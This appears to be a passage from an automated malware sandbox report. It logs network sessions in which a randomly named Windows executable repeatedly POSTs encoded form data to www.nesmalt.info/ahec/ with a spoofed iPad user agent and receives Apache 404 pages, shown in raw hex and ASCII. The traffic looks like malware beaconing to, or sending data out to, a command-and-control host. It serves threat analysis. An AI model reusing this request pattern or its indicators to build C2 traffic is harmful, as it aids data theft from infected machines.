                                                                          21192.168.2.54974066.29.155.54801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:27.372802973 CET788OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.nesmalt.info
                                                                          Origin: http://www.nesmalt.info
                                                                          Referer: http://www.nesmalt.info/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 6b 46 2b 42 33 79 62 78 4f 31 2b 77 55 48 4e 49 48 46 46 67 43 52 31 69 73 55 56 45 7a 34 31 6c 4d 69 68 63 44 6f 63 61 65 6a 76 76 42 4d 4b 4c 41 67 46 64 43 67 6a 63 4f 67 34 58 55 4f 75 55 47 66 36 33 33 58 70 57 62 4d 7a 69 56 37 4c 55 4b 67 6b 44 50 41 62 4d 74 38 6b 4a 59 47 4f 69 73 37 69 74 61 34 78 32 6d 7a 59 39 79 6e 58 45 6a 70 4f 30 2f 39 4d 77 48 74 73 76 2f 76 61 64 61 36 4c 51 41 57 69 62 77 6a 6f 64 43 65 43 38 75 36 31 43 65 59 69 41 56 72 48 4e 65 54 6b 47 32 6b 74 6a 6b 51 3d 3d
                                                                          Data Ascii: KHcH=ORDmYl44AESwkF+B3ybxO1+wUHNIHFFgCR1isUVEz41lMihcDocaejvvBMKLAgFdCgjcOg4XUOuUGf633XpWbMziV7LUKgkDPAbMt8kJYGOis7ita4x2mzY9ynXEjpO0/9MwHtsv/vada6LQAWibwjodCeC8u61CeYiAVrHNeTkG2ktjkQ==
                                                                          Dec 2, 2023 18:49:27.646137953 CET1340INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:27 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                          Dec 2, 2023 18:49:27.646183968 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                          Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                          Dec 2, 2023 18:49:27.646190882 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                          Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                          Dec 2, 2023 18:49:27.646199942 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                          Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                          Dec 2, 2023 18:49:27.646265984 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                          Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.54974166.29.155.54801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:30.064155102 CET808OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.nesmalt.info
                                                                          Origin: http://www.nesmalt.info
                                                                          Referer: http://www.nesmalt.info/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 32 55 4f 42 30 52 7a 78 47 31 2b 7a 59 6e 4e 49 4e 6c 46 6b 43 52 70 69 73 56 51 66 7a 4b 52 6c 4e 44 52 63 43 74 6f 61 64 6a 76 76 4b 73 4b 58 64 77 46 47 43 67 65 68 4f 68 55 58 55 4f 36 55 47 64 53 33 32 6d 70 52 61 63 7a 67 65 62 4c 53 45 41 6b 44 50 41 62 4d 74 38 68 65 59 43 71 69 77 61 53 74 49 70 78 35 34 44 59 2b 37 48 58 45 6e 70 50 39 2f 39 4d 53 48 76 49 46 2f 71 47 64 61 2f 33 51 42 44 57 45 70 7a 6f 62 4e 2b 44 58 75 4a 45 4c 54 37 65 79 51 62 53 37 4e 52 51 52 7a 78 42 77 6a 68 77 6e 72 67 38 6e 47 38 51 78 51 4b 39 32 34 58 62 75 33 53 45 3d
                                                                          Data Ascii: KHcH=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKRlNDRcCtoadjvvKsKXdwFGCgehOhUXUO6UGdS32mpRaczgebLSEAkDPAbMt8heYCqiwaStIpx54DY+7HXEnpP9/9MSHvIF/qGda/3QBDWEpzobN+DXuJELT7eyQbS7NRQRzxBwjhwnrg8nG8QxQK924Xbu3SE=
                                                                          Dec 2, 2023 18:49:30.330429077 CET1340INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:30 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                          Dec 2, 2023 18:49:30.330456972 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                          Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                          Dec 2, 2023 18:49:30.330468893 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                          Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                          Dec 2, 2023 18:49:30.330482960 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                          Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                          Dec 2, 2023 18:49:30.330497026 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                          Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.54974266.29.155.54801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:32.758419991 CET1821OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.nesmalt.info
                                                                          Origin: http://www.nesmalt.info
                                                                          Referer: http://www.nesmalt.info/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 32 55 4f 42 30 52 7a 78 47 31 2b 7a 59 6e 4e 49 4e 6c 46 6b 43 52 70 69 73 56 51 66 7a 4b 5a 6c 4e 78 70 63 44 4f 77 61 63 6a 76 76 44 4d 4b 55 64 77 45 47 43 67 47 6c 4f 68 4a 73 55 4e 43 55 47 2b 71 33 2b 30 4e 52 55 63 7a 67 44 4c 4c 58 4b 67 6b 57 50 41 4c 41 74 2f 4a 65 59 43 71 69 77 5a 36 74 4c 34 78 35 36 44 59 39 79 6e 58 2b 6a 70 50 52 2f 35 68 74 48 76 4e 79 38 65 4b 64 61 66 48 51 44 31 4b 45 68 7a 6f 5a 49 2b 44 50 75 4a 49 49 54 37 54 4a 51 61 57 56 4e 53 77 52 6c 56 41 59 78 51 67 39 2b 77 56 47 4e 65 30 39 4b 4d 31 6f 67 30 76 6c 73 45 45 79 55 64 64 6d 46 41 62 46 5a 33 30 52 47 62 4e 78 30 45 49 34 6d 6d 4f 70 43 5a 42 4e 51 36 39 6f 72 34 74 53 2f 65 67 51 7a 73 71 4e 4c 47 6b 74 68 79 46 44 44 76 39 30 6d 35 49 42 59 68 47 5a 6e 42 73 5a 66 4b 48 4b 6b 57 70 41 34 38 4c 69 71 49 74 64 7a 6e 79 72 32 6a 7a 51 2f 6f 58 53 46 6b 30 4f 50 59 49 52 42 31 6b 6c 46 31 57 2f 71 38 39 4f 6c 6f 76 36 66 36 42 63 59 32 36 45 37 75 6d 42 7a 49 78 42 6a 59 4f 77 54 4e 30 39 6a 79 50 56 51 67 47 69 38 72 51 78 4a 35 48 6d 6d 66 69 76 45 6b 65 64 4c 4d 34 62 69 71 54 63 59 50 73 54 57 64 2f 79 42 76 64 72 78 64 56 42 79 68 35 59 6a 72 37 64 58 76 76 50 4c 6e 4f 7a 32 53 57 51 31 6b 65 68 4b 4b 49 71 70 65 44 38 64 55 76 72 44 6f 66 55 41 69 32 48 46 6c 73 69 66 6d 68 53 6a 69 47 51 75 33 4f 62 7a 6b 43 77 4e 4a 76 45 73 49 57 50 61 52 74 39 56 6d 42 45 43 4b 6b 2f 57 64 76 63 39 54 52 4b 70 32 52 72 6b 7a 54 55 38 6e 61 76 4c 58 35 6b 47 45 73 4f 66 56 69 71 44 71 32 49 57 4d 61 68 66 61 47 4c 78 4a 64 51 76 6f 44 74 4e 2b 70 59 44 4b 45 70 42 70 6f 53 50 4e 47 64 62 65 4d 4c 5a 4d 4f 53 47 77 6c 6c 55 49 6a 37 7a 4a 34 4c 4e 68 53 63 36 44 2f 48 2b 4f 47 6c 73 32 70 49 4a 56 4c 54 55 6a 30 68 4b 59 71 50 66 58 4a 4d 52 4e 63 6c 32 79 44 5a 51 32 41 66 66 41 77 76 50 33 4b 65 6c 6c 75 4c 66 69 73 30 34 50 47 5a 73 61 69 69 35 61 7a 39 57 4b 58 6d 6f 41 2b 37 52 77 6d 77 67 4a 6b 62 65 78 51 76 36 43 54 4a 47 50 52 4e 74 57 35 49 68 73 30 65 65 6d 6b 45 45 39 2f 66 68 77 53 37 6a 53 58 4f 34 67 78 49 6a 2b 69 42 58 4a 4b 53 4c 77 6e 63 63 72 34 74 4c 6e 33 36 72 36 66 76 31 43 45 71 4d 66 41 62 7a 67 59 41 38 63 42 44 36 37 31 42 7a 34 76 4b 48 79 46 2b 45 49 67 48 35 54 34 4a 45 79 6f 69 4f 77 32 70 51 56 73 2f 52 77 6b 58 30 67 4d 48 55 41 47 30 46 6b 32 65 50 6e 4e 38 61 76 58 63 66 74 38 50 67 59 52 42 4f 37 53 53 61 71 55 57 52 58 49 38 69 79 4a 67 30 52 48 62 50 6a 44 4e 6e 53 71 37 75 7a 78 30 71 48 43 77 59 49 6f 47 78 50 45 2b 72 44 4c 75 76 36 39 33 57 31 70 41 76 55 63 34 4b 39 30 35 36 35 2b 53 65 6c 55 33 6e 46 47 59 68 4d 43 69 65 5a 5a 74 32 52 6b 4b 2f 6a 73 